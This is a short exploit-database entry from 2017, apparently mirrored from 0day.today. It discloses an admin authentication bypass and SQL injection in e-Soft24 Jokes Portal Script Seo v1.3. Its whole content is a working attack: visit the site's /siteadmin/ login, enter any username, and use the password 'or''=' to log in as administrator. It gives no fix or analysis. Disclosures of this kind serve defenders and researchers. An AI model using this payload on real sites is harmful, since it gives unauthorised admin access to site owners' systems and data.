id: 26699
date: 01/16/2017
title: e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass Vulnerability
author: Ihsan Sencan
cves: 

# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Jokes Portal Script Seo
# Script Version: v1.3
# Script Buy Now: http://www.e-soft24.com/jokes-portal-script-seo-p-370.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/siteadmin/ and set Username:anything and Password to 'or''=' and hit enter.
# # # # #

#  0day.today [2023-03-24]  #